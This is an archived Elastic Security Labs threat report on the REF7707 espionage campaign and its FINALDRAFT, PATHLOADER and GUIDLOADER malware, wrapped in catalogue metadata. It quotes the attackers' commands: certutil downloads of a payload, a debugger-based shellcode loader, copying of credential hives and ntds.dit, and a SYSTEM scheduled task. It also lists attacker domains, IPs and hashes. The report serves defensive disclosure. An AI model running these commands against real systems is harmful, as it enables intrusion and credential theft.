{
	"id": "0aedcf35-3a00-441e-b1c6-c6b0e5263cac",
	"created_at": "2026-04-06T00:08:17.719765Z",
	"updated_at": "2026-04-10T03:33:36.972804Z",
	"deleted_at": null,
	"sha1_hash": "2f85c223c0a47f87a182fb85f751701bcdebbc8a",
	"title": "From South America to Southeast Asia: The Fragile Web of REF7707",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1218957,
	"plain_text": "From South America to Southeast Asia: The Fragile Web of REF7707\r\nBy Andrew Pease, Seth Goodwin\r\nPublished: 2025-02-13 · Archived: 2026-04-05 12:48:17 UTC\r\nREF7707 summarized\r\nElastic Security Labs has been monitoring a campaign targeting the foreign ministry of a South American nation that has\r\nlinks to other compromises in Southeast Asia. We track this campaign as REF7707.\r\nWhile the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign\r\nowners exhibited poor campaign management and inconsistent evasion practices.\r\nThe intrusion set utilized by REF7707 includes novel malware families we refer to as FINALDRAFT, GUIDLOADER, and\r\nPATHLOADER. We have provided a detailed analysis of their functions and capabilities in the malware analysis report of\r\nREF7707 - You've Got Malware: FINALDRAFT Hides in Your Drafts.\r\nKey takeaways\r\nREF7707 leveraged novel malware against multiple targets\r\nThe FINALDRAFT malware has both a Windows and Linux variant\r\nREF7707 used an uncommon LOLBin to obtain endpoint execution\r\nHeavy use of cloud and third-party services for C2\r\nThe attackers used weak operational security that exposed additional malware and infrastructure not used in this\r\ncampaign\r\nCampaign Overview\r\nIn late November 2024, Elastic Security Labs observed a tight cluster of endpoint behavioral alerts occurring at the Foreign\r\nMinistry of a South American country. As the investigation continued, we discovered a sprawling campaign and intrusion set\r\nthat included novel malware, sophisticated targeting, and a mature operating cadence.\r\nWhile parts of the campaign showed a high level of planning and technical competence, numerous tactical oversights\r\nexposed malware pre-production samples, infrastructure, and additional victims.\r\nCampaign layout (the diamond model)\r\nElastic Security Labs utilizes the Diamond Model to describe high-level relationships between adversaries, capabilities,\r\ninfrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions and\r\nleveraging Activity Threading (section 8) to create relationships between incidents, an adversary-centered (section 7.1.4)\r\napproach allows for a — although cluttered — single diamond.\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 1 of 13\n\nREF7707 - Diamond Model\r\nExecution Flow\r\nPrimary execution chain\r\nREF7707 was initially identified through Elastic Security telemetry of a South American nation’s Foreign Ministry. We\r\nobserved a common LOLBin tactic using Microsoft’s certutil application to download files from a remote server and save\r\nthem locally.\r\ncertutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\\ProgramData\\fontdrvhost.exe\r\ncertutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\\ProgramData\\fontdrvhost.rar\r\ncertutil -urlcache -split -f https://[redacted]/config.ini C:\\ProgramData\\config.ini\r\ncertutil -urlcache -split -f https://[redacted]/wmsetup.log C:\\ProgramData\\wmsetup.log\r\nThe web server hosting fontdrvhost.exe , fontdrvhost.rar , config.ini , and wmsetup.log was located within the\r\nsame organization; however, it was not running the Elastic Agent. This was the first lateral movement observed and\r\nprovided insights about the intrusion. We’ll discuss these files in more detail, but for now, fontdrvhost.exe is a debugging\r\ntool, config.ini is a weaponized INI file, and fontdrvhost.rar was not recoverable.\r\nWinrsHost.exe\r\nWindows Remote Management’s Remote Shell plugin ( WinrsHost.exe ) was used to download the files to this system from\r\nan unknown source system on a connected network. The plugin is the client-side process used by Windows Remote\r\nManagement. It indicates that attackers already possessed valid network credentials and were using them for lateral\r\nmovement from a previously compromised host in the environment. How these credentials were obtained is unknown; it is\r\npossible that the credentials were obtained from the web server hosting the suspicious files.\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 2 of 13\n\nWinrsHost.exe is used to execute commands\r\nThe attacker downloaded fontdrvhost.exe , fontdrvhost.rar , config.ini , and wmsetup.log to the\r\nC:\\ProgramData\\ directory; from there, the attacker moved to several other Windows endpoints. While we can’t identify\r\nall of the exposed credentials, we noted the use of a local administrator account to download these files.\r\nFollowing the downloads from the web server to the endpoint, we saw a cluster of behavioral rules firing in quick\r\nsuccession.\r\nBehavioral rules accelerating\r\nOn six Windows systems, we observed the execution of an unidentified binary\r\n( 08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1 ) as a child of Services.exe . This suspicious\r\nbinary uses a pseudo-randomly assigned file name consisting of six camel case letters with a .exe extension and is located\r\nin the C:\\Windows\\ path (example: C:\\Windows\\cCZtzzwy.exe ). We could not collect this file for analysis, but we infer\r\nthat this is a variant of PATHLOADER based on the file size ( 170,495 bytes) and its location. This file was passed\r\nbetween systems using SMB.\r\nFontDrvHost.exe\r\nOnce the attacker collected fontdrvhost.exe , fontdrvhost.rar , config.ini , and wmsetup.log , it executed\r\nfontdrvhost.exe ( cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9 ) to continue with the\r\nintrusion. fontdrvhost.exe is a renamed version of the Windows-signed debugger CDB.exe . Abuse of this binary allowed\r\nour attackers to execute malicious shellcode delivered in the config.ini file under the guise of trusted binaries.\r\nCDB is a debugger that is over 15 years old. In researching how often it was submitted with suspicious files to VirusTotal,\r\nwe see increased activity in 2021 and an aggressive acceleration starting in late 2024.\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 3 of 13\n\nVirusTotal submissions and lookups for CDB.exe\r\nCDB is a documented LOLBas file, but there hasn’t been much-published research on how it can be abused. Security\r\nresearcher mrd0x wrote a great analysis of CDB outlining how it can be used to run shellcode, launch executables, run\r\nDLLs, execute shell commands, and terminate security solutions (and even an older analysis from 2016 using it as a\r\nshellcode runner). While not novel, this is an uncommon attack methodology and could be used with other intrusion\r\nmetadata to link actors across campaigns.\r\nWhile config.ini was not collected for analysis, it contained a mechanism through which fontdrvhost.exe loaded\r\nshellcode; how it was invoked is similar to FINALDRAFT.\r\nC:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\r\n-cf - specifies the path and name of a script file. This script file is executed as soon as the debugger is started\r\nconfig.ini - this is the script to be loaded\r\n-o - debugs all processes launched by the target application\r\nThen fontdrvhost.exe spawned mspaint.exe and injected shellcode into it.\r\nShellcode injection into mspaint.exe\r\nElastic Security Labs reverse engineers analyzed this shellcode to identify and characterize the FINALDRAFT malware.\r\nFinally, fontdrvhost.exe injected additional shellcode into memory\r\n( 6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3 ) that was also identified as the FINALDRAFT\r\nmalware.\r\nAs described in the analysis of FINALDRAFT, the malware defaults to mspaint.exe or conhost.exe if no target\r\nparameter is provided for an injection-related command.\r\nConnectivity checks\r\nThe adversary performed several connectivity tests using the ping.exe command and via PowerShell.\r\nPowershell’s Invoke-WebRequest cmdlet is similar to wget or curl, which pulls down the contents of a web resource.\r\nThis cmdlet may be used to download tooling from the command line, but that was not the case here. These requests in\r\ncontext with several ping s are more likely to be connectivity checks.\r\ngraph.microsoft[.]com and login.microsoftonline[.]com are legitimately owned Microsoft sites that serve API and\r\nweb GUI traffic for Microsoft’s Outlook cloud email service and other Office 365 products.\r\nping graph.microsoft[.]com\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 4 of 13\n\nping www.google[.]com\r\nPowershell Invoke-WebRequest -Uri \\\"hxxps://google[.]com\\\r\nPowershell Invoke-WebRequest -Uri \\\"hxxps://graph.microsoft[.]com\\\" -UseBasicParsing\r\nPowershell Invoke-WebRequest -Uri \\\"hxxps://login.microsoftonline[.]com\\\" -UseBasicParsing\r\ndigert.ictnsc[.]com and support.vmphere[.]com were adversary-owned infrastructure.\r\nping digert.ictnsc[.]com\r\nPowershell Invoke-WebRequest -Uri \\\"hxxps://support.vmphere[.]com\\\" -UseBasicParsing\r\nWe cover more about these network domains in the infrastructure section below.\r\nReconnaissance / enumeration / credential harvesting\r\nThe adversary executed an unknown script called SoftwareDistribution.txt using the diskshadow.exe utility, extracted\r\nthe SAM, SECURITY, and SYSTEM Registry hives, and copied the Active Directory database ( ntds.dit ). These\r\nmaterials primarily contain credentials and credential metadata. The adversary used the 7zip utility to compress the results:\r\ndiskshadow.exe /s C:\\\\ProgramData\\\\SoftwareDistribution.txt\r\ncmd.exe /c copy z:\\\\Windows\\\\System32\\\\config\\\\SAM C:\\\\ProgramData\\\\[redacted].local\\\\SAM /y\r\ncmd.exe /c copy z:\\\\Windows\\\\System32\\\\config\\\\SECURITY C:\\\\ProgramData\\\\[redacted].local\\\\SECURITY /y\r\ncmd.exe /c copy z:\\\\Windows\\\\System32\\\\config\\\\SYSTEM C:\\\\ProgramData\\\\[redacted].local\\\\SYSTEM /y\r\ncmd.exe /c copy z:\\\\windows\\\\ntds\\\\ntds.dit C:\\\\ProgramData\\\\[redacted].local\\\\ntds.dit /y\r\n7za.exe a [redacted].local.7z \\\"C:\\\\ProgramData\\\\[redacted].local\\\\\\\"\r\nThe adversary also enumerated information about the system and domain:\r\nsysteminfo\r\ndnscmd . /EnumZones\r\nnet group /domain\r\nC:\\\\Windows\\\\system32\\\\net1 group /domain\r\nquser\r\nreg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\UUID\r\nreg query \\\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\UUID\\\"\r\nreg query \\\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\UUID\\\"\r\nPersistence\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 5 of 13\n\nPersistence was achieved using a Scheduled Task that invoked the renamed CDB.exe debugger and the weaponized INI file\r\nevery minute as SYSTEM . This methodology ensured that FINALDRAFT resided in memory.\r\nschtasks /create /RL HIGHEST /F /tn \\\"\\\\Microsoft\\\\Windows\\\\AppID\\\\EPolicyManager\\\"\r\n/tr \\\"C:\\\\ProgramData\\\\fontdrvhost.exe -cf C:\\\\ProgramData\\\\config.ini -o C:\\\\ProgramData\\\\fontdrvhost.exe\\\"\r\n/sc MINUTE /mo 1 /RU SYSTEM\r\nschtasks - the Scheduled Task program\r\n/create - creates a new scheduled task\r\n/RL HIGHEST - specifies the run level of the job, HIGHEST runs as the highest level of privileges\r\n/F - suppress warnings\r\n/tn \\\\Microsoft\\\\Windows\\\\AppID\\\\EPolicyManager\\ - task name, attempting to mirror an authentic looking\r\nscheduled task\r\n/tr \\\"C:\\\\ProgramData\\\\fontdrvhost.exe -cf C:\\\\ProgramData\\\\config.ini -o\r\nC:\\\\ProgramData\\\\fontdrvhost.exe\\\" - task to run, in this case the fontdrvhost.exe commands we covered\r\nearlier\r\n/sc MINUTE - schedule type, MINUTE specifies the to run on minute intervals\r\n/mo 1 - modifier, defines 1 for the schedule interval\r\n/RU SYSTEM - defines what account to run as; in this situation, the task will run as the SYSTEM user\r\nFINALDRAFT Analysis\r\nA technical deep-dive describing the capabilities and architecture of the FINALDRAFT and PATHLOADER malware is\r\navailable here. At a high level, FINALDRAFT is a well-engineered, full-featured remote administration tool with the ability\r\nto accept add-on modules that extend functionality and proxy network traffic internally by multiple means.\r\nAlthough FINALDRAFT can establish command and control using various means, the most notable are the means we\r\nobserved in our victim environment, abuse of Microsoft’s Graph API. We first observed this type of third-party C2 in\r\nSIESTAGRAPH, which we reported in December 2022.\r\nThis command and control type is challenging for defenders of organizations that heavily depend on network visibility to\r\ncatch. Once the initial execution and check-in have been completed, all further communication proceeds through legitimate\r\nMicrosoft infrastructure ( graph.microsoft[.]com ) and blends in with the other organizational workstations. It also\r\nsupports relay functionality that enables it to proxy traffic for other infected systems. It evades defenses reliant on network-based intrusion detection and threat-intelligence indicators.\r\nPATHLOADER and GUIDLOADER\r\nBoth PATHLOADER and GUIDLOADER are used to download and execute encrypted shellcodes in memory. They were\r\ndiscovered in VirusTotal while investigating the C2 infrastructure and strings identified within a FINALDRAFT memory\r\ncapture. They have only been observed in association with FINALDRAFT payloads.\r\nA May 2023 sample in VirusTotal is the earliest identified binary of the REF7707 intrusion set. This sample was first\r\nsubmitted by a web user from Thailand, dwn.exe\r\n( 9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf ) is a PATHLOADER variant that loads an\r\nencrypted FINALDRAFT binary from poster.checkponit[.]com and support.fortineat[.]com .\r\nBetween June and August of 2023, a Hong Kong VirusTotal web user uploaded 12 samples of GUIDLOADER. These\r\nsamples each had minor modifications to how the encrypted payload was downloaded and were configured to use\r\nFINALDRAFT domains:\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 6 of 13\n\nposter.checkponit[.]com\r\nsupport.fortineat[.]com\r\nGoogle Firebase ( firebasestorage.googleapis[.]com )\r\nPastebin ( pastebin[.]com )\r\nA Southeast Asian University public-facing web storage system\r\nSome samples of GUIDLOADER appear unfinished or broken, with non-functional decryption routines, while others\r\ncontain debug strings embedded in the binary. These variations suggest that the samples were part of a development and\r\ntesting process.\r\nFINALDRAFT bridging OS’\r\nIn late 2024, two Linux ELF FINALDRAFT variants were uploaded to VirusTotal, one from the United States and one from\r\nBrazil. These samples feature similar C2 versatility and a partial reimplementation of the commands available in the\r\nWindows version. URLs were pulled from these files for support.vmphere[.]com , update.hobiter[.]com , and\r\npastebin.com .\r\nInfrastructure Analysis\r\nIn the FINALDRAFT malware analysis report, several domains were identified in the samples collected in the REF7707\r\nintrusion, and other samples were identified through code similarity.\r\nService banner hashes\r\nA Censys search for hobiter[.]com (the domain observed in the ELF variant of FINALDRAFT, discussed in the previous\r\nsection) returns an IP address of 47.83.8.198 . This server is Hong Kong-based and is serving ports 80 and 443 . The\r\nstring “ hobiter[.]com ” is associated with the TLS certificate on port 443 . A Censys query pivot on the service banner\r\nhash of this port yields six additional servers that share that hash (seven total).\r\nIP TLS Cert names Cert CN ports ASN GEO\r\n47.83.8.198 *.hobiter[.]com\r\nCloudFlare\r\nOrigin\r\nCertificate\r\n80 , 443 45102 Hong Kong\r\n8.218.153.45 *.autodiscovar[.]com\r\nCloudFlare\r\nOrigin\r\nCertificate\r\n53 , 443 , 2365 ,\r\n3389 , 80\r\n45102 Hong Kong\r\n45.91.133.254 *.vm-clouds[.]net\r\nCloudFlare\r\nOrigin\r\nCertificate\r\n443 , 3389 56309\r\nNonthaburi,\r\nThailand\r\n8.213.217.182 *.ictnsc[.]com\r\nCloudFlare\r\nOrigin\r\nCertificate\r\n53 , 443 , 3389 , 80 45102\r\nBangkok,\r\nThailand\r\n47.239.0.216 *.d-links[.]net\r\nCloudFlare\r\nOrigin\r\nCertificate\r\n80 , 443 45102 Hong Kong\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 7 of 13\n\nIP TLS Cert names Cert CN ports ASN GEO\r\n203.232.112.186 [NONE] [NONE]\r\n80 , 5357 , 5432 ,\r\n5985 , 8000 , 8080 ,\r\n9090 , 15701 , 15702 ,\r\n15703 , 33990 47001\r\n4766\r\nDaejeon,\r\nSouth Korea\r\n13.125.236.162 [NONE] [NONE]\r\n80 , 3389 , 8000 ,\r\n15111 , 15709 ,\r\n19000\r\n16509\r\nIncheon,\r\nSouth Korea\r\nTwo servers ( 203.232.112[.]186 and 13.125.236[.]162 ) do not share the same profile as the other five. While the\r\nservice banner hash still matches, it is not on port 443 , but on ports 15701 , 15702 , 15703 , and 15709 . Further, the\r\nports in question do not appear to support TLS communications. We have not attributed them to REF7707 with a high\r\ndegree of confidence but are including them for completeness.\r\nThe other five servers, including the original “hobiter” server, share several similarities:\r\nService banner hash match on port 443\r\nSoutheast Asia geolocations\r\nWindows OS\r\nCloudflare issued TLS certs\r\nMost have the same ASN belonging to Alibaba\r\nHobiter and VMphere\r\nupdate.hobiter[.]com and support.vmphere[.]com were found in an ELF binary (biosets.rar) from December 13, 2024.\r\nBoth domains were registered over a year earlier, on September 12, 2023. This ELF binary features similar C2 versatility\r\nand a partial reimplementation of the commands available in the Windows version of FINALDRAFT.\r\nA name server lookup of hobiter[.]com and vmphere[.]com yields only a Cloudflare name server record for each and no\r\nA records. Searching for their known subdomains provides us with A records pointing to Cloudflare-owned IP addresses.\r\nICTNSC\r\nictnsc[.]com is directly associated with the REF7707 intrusion above from a connectivity check ( ping\r\ndigert.ictnsc[.]com ) performed by the attackers. The server associated with this domain ( 8.213.217[.]182 ) was\r\nidentified through the Censys service banner hash on the HTTPS service outlined above. Like the other identified\r\ninfrastructure, the subdomain resolves to Cloudflare-owned IP addresses, and the parent domain only has a Cloudflare NS\r\nrecord. ictnsc[.]com was registered on February 8, 2023.\r\nWhile we cannot confirm the association as malicious, it should be noted that the domain ict.nsc[.]ru is the Federal\r\nResearch Center for Information and Computational Technologies web property, often referred to as the FRC or the ICT.\r\nThis Russian organization conducts research in various areas like computer modeling, software engineering, data processing,\r\nartificial intelligence, and high-performance computing.\r\nWhile not observed in the REF7707 intrusion, the domain we observed ( ictnsc[.]com ) has an ict subdomain\r\n( ict.ictnsc[.]com ), which is strikingly similar to ict.nsc[.]ru . Again, we cannot confirm if they are related to the\r\nlegitimate FRC or ITC, it seems the threat actor intended for the domains to be similar, conflated, or confused with each\r\nother.\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 8 of 13\n\nAutodiscovar\r\nAutodiscovar[.]com has not been directly associated with any FINALDRAFT malware. It has been indirectly associated\r\nwith REF7707 infrastructure through pivots on web infrastructure identifiers. The parent domain only has a Cloudflare NS\r\nrecord. A subdomain identified through VirusTotal ( cloud.autodiscovar[.]com ) points to Cloudflare-owned IP addresses.\r\nThis domain name resembles other FINALDRAFT and REF7707 web infrastructure and shares the HTTPS service banner\r\nhash. This domain was registered on August 26, 2022.\r\nD-links and VM-clouds\r\nd-links[.]net and vm-clouds[.]net were both registered on September 12, 2023, the same day as hobiter[.]com and\r\nvmphere[.]com . The servers hosting these sites also share the same HTTPS service banner hash. They are not directly\r\nassociated with the FINALDRAFT malware nor have current routable subdomains, though pol.vm-clouds[.]net was\r\npreviously registered.\r\nFortineat\r\nsupport.fortineat[.]com was hard-coded in the PATHLOADER sample ( dwn.exe ). During our analysis of the domain,\r\nwe discovered that it was not currently registered. To identify any other samples communicating with the domain, our team\r\nregistered this domain and configured a web server to listen for incoming connections.\r\nWe recorded connection attempts over port 443 , where we identified a specific incoming byte pattern. The connections\r\nwere sourced from eight different telecommunications and Internet infrastructure companies in Southeast Asia, indicating\r\npossible victims of the REF7707 intrusion set.\r\nCheckponit\r\nposter.checkponit[.]com was observed in four GUIDLOADER samples and a PATHLOADER sample between May and\r\nJuly 2023, and it was used to host the FINALDRAFT encrypted shellcode. The checkponit[.]com registration was created\r\non August 26, 2022. There are currently no A records for checkponit[.]com or poster.checkponit[.]com .\r\nThird-party infrastructure\r\nMicrosoft’s graph.microsoft[.]com is used by the FINALDRAFT PE and ELF variants for command and control via the\r\nGraph API. This service is ubiquitous and used for critical business processes of enterprises using Office 365. Defenders are\r\nhighly encouraged to NOT block-list this domain unless business ramifications are understood.\r\nGoogle’s Firebase service ( firebasestorage.googleapis[.]com ), Pastebin ( pastebin[.]com ), and a Southeast Asian\r\nUniversity are third-party services used to host the encrypted payload for the loaders (PATHLOADER and GUIDLOADER)\r\nto download and decrypt the last stage of FINALDRAFT.\r\nREF7707 timeline\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 9 of 13\n\nREF7707 timeline\r\nConclusion\r\nREF7707 was discovered while investigating an intrusion of a South American nation's Foreign Ministry.\r\nThe investigation revealed novel malware like FINALDRAFT and its various loaders. These tools were deployed and\r\nsupported using built-in operating system features that are difficult for traditional anti-malware tools to detect.\r\nFINALDRAFT co-opts Microsoft’s graph API service for command and control to minimize malicious indicators that would\r\nbe observable to traditional network-based intrusion detection and prevention systems. Third-party hosting platforms for\r\nencrypted payload staging also challenge these systems early in the infection chain.\r\nAn overview of the VirusTotal submitters and pivots using the indicators in this report shows a relatively heavy geographic\r\npresence in Southeast Asia and South America. SIESTAGRAPH, similarly, was the first in-the-wild graph API abuse we had\r\nobserved, and it (REF2924) involved an attack on a Southeast Asian nation’s Foreign Ministry.\r\nAt Elastic Security Labs, we champion defensive capabilities across infosec domains operated by knowledgeable\r\nprofessionals to mitigate advanced threats best.\r\nREF7707 through MITRE ATT\u0026CK\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks.\r\nReconnaissance\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 10 of 13\n\nCommand and Control\r\nExfiltration\r\nDetecting REF7707\r\nYARA\r\nFINALDRAFT (Windows)\r\nFINALDRAFT (Linux)\r\nFINALDRAFT (Multi-OS)\r\nPATHLOADER\r\nGUIDLOADER\r\nObservations\r\nThe following observables were discussed in this research.\r\nObservable Type Name Reference\r\n39e85de1b1121dc38a33eca97c41dbd9210124162c6d669d28480c833e059530\r\nSHA-256\r\nSession.x64.dll FINALDRAFT\r\n83406905710e52f6af35b4b3c27549a12c28a628c492429d3a411fdb2d28cc8c\r\nSHA-256\r\npfman\r\nFINALDRAFT\r\nELF\r\nf45661ea4959a944ca2917454d1314546cc0c88537479e00550eef05bed5b1b9\r\nSHA-256\r\nbiosets.rar\r\nFINALDRAFT\r\nELF\r\n9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf\r\nSHA-256\r\ndwn.exe PATHLOADER\r\n41a3a518cc8abad677bb2723e05e2f052509a6f33ea75f32bd6603c96b721081\r\nSHA-256\r\n5.exe GUIDLOADER\r\nd9fc1cab72d857b1e4852d414862ed8eab1d42960c1fd643985d352c148a6461\r\nSHA-256\r\n7.exe GUIDLOADER\r\nf29779049f1fc2d45e43d866a845c45dc9aed6c2d9bbf99a8b1bdacfac2d52f2\r\nSHA-256\r\n8.exe GUIDLOADER\r\n17b2c6723c11348ab438891bc52d0b29f38fc435c6ba091d4464f9f2a1b926e0\r\nSHA-256\r\n3.exe GUIDLOADER\r\n20508edac0ca872b7977d1d2b04425aaa999ecf0b8d362c0400abb58bd686f92\r\nSHA-256\r\n1.exe GUIDLOADER\r\n33f3a8ef2c5fbd45030385b634e40eaa264acbaeb7be851cbf04b62bbe575e75\r\nSHA-256\r\n1.exe GUIDLOADER\r\n41141e3bdde2a7aebf329ec546745149144eff584b7fe878da7a2ad8391017b9\r\nSHA-256\r\n11.exe GUIDLOADER\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 11 of 13\n\nObservable Type Name Reference\r\n49e383ab6d092ba40e12a255e37ba7997f26239f82bebcd28efaa428254d30e1\r\nSHA-256\r\n2.exe GUIDLOADER\r\n5e3dbfd543909ff09e343339e4e64f78c874641b4fe9d68367c4d1024fe79249\r\nSHA-256\r\n4.exe GUIDLOADER\r\n7cd14d3e564a68434e3b705db41bddeb51dbb7d5425fd901c5ec904dbb7b6af0\r\nSHA-256\r\n1.exe GUIDLOADER\r\n842d6ddb7b26fdb1656235293ebf77c683608f8f312ed917074b30fbd5e8b43d\r\nSHA-256\r\n2.exe GUIDLOADER\r\nf90420847e1f2378ac8c52463038724533a9183f02ce9ad025a6a10fd4327f12\r\nSHA-256\r\n6.exe GUIDLOADER\r\nposter.checkponit[.]com\r\ndomain-nameREF7707\r\ninfrastructure\r\nsupport.fortineat[.]com\r\ndomain-nameREF7707\r\ninfrastructure\r\nupdate.hobiter[.]com\r\ndomain-nameREF7707\r\ninfrastructure\r\nsupport.vmphere[.]com\r\ndomain-nameREF7707\r\ninfrastructure\r\ncloud.autodiscovar[.]com\r\ndomain-nameREF7707\r\ninfrastructure\r\ndigert.ictnsc[.]com\r\ndomain-nameREF7707\r\ninfrastructure\r\nd-links[.]net\r\ndomain-nameREF7707\r\ninfrastructure\r\nvm-clouds[.]net\r\ndomain-nameREF7707\r\ninfrastructure\r\n47.83.8[.]198\r\nipv4-\r\naddr\r\nREF7707\r\ninfrastructure\r\n8.218.153[.]45\r\nipv4-\r\naddr\r\nREF7707\r\ninfrastructure\r\n45.91.133[.]254\r\nipv4-\r\naddr\r\nREF7707\r\ninfrastructure\r\n8.213.217[.]182\r\nipv4-\r\naddr\r\nREF7707\r\ninfrastructure\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 12 of 13\n\nObservable Type Name Reference\r\n47.239.0[.]216\r\nipv4-\r\naddr\r\nREF7707\r\ninfrastructure\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://www.elastic.co/security-labs/finaldraft\r\nhttps://mrd0x.com/the-power-of-cdb-debugging-tool/\r\nhttps://web.archive.org/web/20210305190100/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html\r\nAbout Elastic Security Labs\r\nElastic Security Labs is dedicated to creating positive change in the threat landscape by providing publicly available\r\nresearch on emerging threats.\r\nFollow Elastic Security Labs on X @elasticseclabs and check out our research at www.elastic.co/security-labs/. You can see\r\nthe technology we leveraged for this research and more by checking out Elastic Security.\r\nSource: https://www.elastic.co/security-labs/fragile-web-ref7707\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/security-labs/fragile-web-ref7707"
	],
	"report_names": [
		"fragile-web-ref7707"
	],
	"threat_actors": [
		{
			"id": "dbee5a02-e2d6-49d2-9bb5-5a9e93fd1de9",
			"created_at": "2023-11-07T02:00:07.108976Z",
			"updated_at": "2026-04-10T02:00:03.411448Z",
			"deleted_at": null,
			"main_name": "REF2924",
			"aliases": [],
			"source_name": "MISPGALAXY:REF2924",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "68a86dfa-1a6d-4254-bd39-a9aa1129fdf5",
			"created_at": "2025-05-29T02:00:03.198435Z",
			"updated_at": "2026-04-10T02:00:03.855309Z",
			"deleted_at": null,
			"main_name": "REF7707",
			"aliases": [
				"CL-STA-0049",
				"Jewelbug"
			],
			"source_name": "MISPGALAXY:REF7707",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434097,
	"ts_updated_at": 1775792016,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2f85c223c0a47f87a182fb85f751701bcdebbc8a.pdf",
		"text": "https://archive.orkl.eu/2f85c223c0a47f87a182fb85f751701bcdebbc8a.txt",
		"img": "https://archive.orkl.eu/2f85c223c0a47f87a182fb85f751701bcdebbc8a.jpg"
	}
}